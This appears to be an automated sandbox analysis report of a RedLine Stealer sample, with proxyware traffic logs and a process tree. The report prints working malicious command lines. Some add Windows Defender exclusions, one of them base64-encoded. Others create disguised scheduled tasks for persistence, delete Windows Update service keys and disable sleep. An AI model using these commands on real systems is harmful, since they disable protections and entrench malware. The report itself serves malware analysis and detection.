2022-11-26 10:19:22 UTC	2531	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:22 UTC	2531	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:22 UTC	2531	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:22 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2aa682a90bb-FRA
2022-11-26 10:19:22 UTC	2531	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.5	49994	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:22 UTC	2532	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:22 UTC	2532	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:22 UTC	2532	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:22 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2ac3a839bef-FRA
2022-11-26 10:19:22 UTC	2532	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.5	49997	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:23 UTC	2532	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:23 UTC	2532	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:23 UTC	2533	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:23 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2ae0fc56928-FRA
2022-11-26 10:19:23 UTC	2533	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.5	50000	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:23 UTC	2533	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:23 UTC	2533	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:23 UTC	2533	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:23 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2b01e1fbb8b-FRA
2022-11-26 10:19:23 UTC	2533	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.5	50003	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:23 UTC	2534	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:23 UTC	2534	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:23 UTC	2534	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:23 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2b1d9db90e2-FRA
2022-11-26 10:19:23 UTC	2534	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.5	50006	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-26 10:19:24 UTC	2534	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-26 10:19:24 UTC	2534	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-26 10:19:24 UTC	2535	IN	HTTP/1.1 200 OK Date: Sat, 26 Nov 2022 10:19:24 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7701e2b3d87791fc-FRA
2022-11-26 10:19:24 UTC	2535	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 36 38 2e 31 37 31 2e 32 34 39 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.68.171.249", "port": 443, "peer_id": 239417018 }}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: hZDPlQwZ9D.exePID: 5852, Parent PID: 3324

General

Target ID:	0
Start time:	11:17:03
Start date:	26/11/2022
Path:	C:\Users\user\Desktop\hZDPlQwZ9D.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\hZDPlQwZ9D.exe
Imagebase:	0x400000
File size:	219648 bytes
MD5 hash:	184CC76BBAAB70F127EE9635E5A08147
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.294985121.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.293525865.0000000000702000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.294596055.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5860, Parent PID: 5852

General

Target ID:	1
Start time:	11:17:03
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vbc.exePID: 5440, Parent PID: 5852

General

Target ID:	2
Start time:	11:17:04
Start date:	26/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0x8e0000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.449590590.0000000006B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.455691284.0000000006DA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 1348, Parent PID: 5852

General

Target ID:	5
Start time:	11:17:05
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 132
Imagebase:	0xb50000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: brave.exePID: 5100, Parent PID: 5440

General

Target ID:	6
Start time:	11:17:40
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Google\brave.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Google\brave.exe"
Imagebase:	0x7ff652b20000
File size:	2884608 bytes
MD5 hash:	9253ED091D81E076A3037E12AF3DC871
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 85%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1380, Parent PID: 5100

General

Target ID:	7
Start time:	11:17:42
Start date:	26/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff7fbaf0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 1248, Parent PID: 5440

General

Target ID:	8
Start time:	11:17:42
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Google\ofg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Google\ofg.exe"
Imagebase:	0x7ff6ffff0000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\Local\Google\ofg.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 27%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6112, Parent PID: 1380

General

Target ID:	9
Start time:	11:17:42
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5856, Parent PID: 1248

General

Target ID:	10
Start time:	11:17:42
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0x11c0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3608, Parent PID: 5856

General

Target ID:	11
Start time:	11:17:42
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 272, Parent PID: 5440

General

Target ID:	12
Start time:	11:17:44
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Google\chrome.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Google\chrome.exe"
Imagebase:	0x870000
File size:	6423552 bytes
MD5 hash:	8CD1EA50F8F4C45055400E70DA52B326
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: ofg.exePID: 4664, Parent PID: 1084

General

Target ID:	13
Start time:	11:17:44
Start date:	26/11/2022
Path:	C:\Users\user\AppData\Local\Google\ofg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Google\ofg.exe
Imagebase:	0xea0000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 3388, Parent PID: 4664

General

Target ID:	14
Start time:	11:17:44
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0x11c0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5584, Parent PID: 3388

General

Target ID:	15
Start time:	11:17:45
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6068, Parent PID: 5100

General

Target ID:	17
Start time:	11:17:48
Start date:	26/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff627730000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5560, Parent PID: 5100

General

Target ID:	18
Start time:	11:17:48
Start date:	26/11/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff627730000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5916, Parent PID: 6068

General

Target ID:	19
Start time:	11:17:48
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5984, Parent PID: 272

General

Target ID:	20
Start time:	11:17:48
Start date:	26/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Imagebase:	0xc30000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4948, Parent PID: 5100

General

Target ID:	21
Start time:	11:17:48
Start date:	26/11/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff7fbaf0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4680, Parent PID: 5560

General

Target ID:	22
Start time:	11:17:48
Start date:	26/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 348, Parent PID: 6068

General

Target ID:	23
Start time:	11:17:49
Start date:	26/11/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
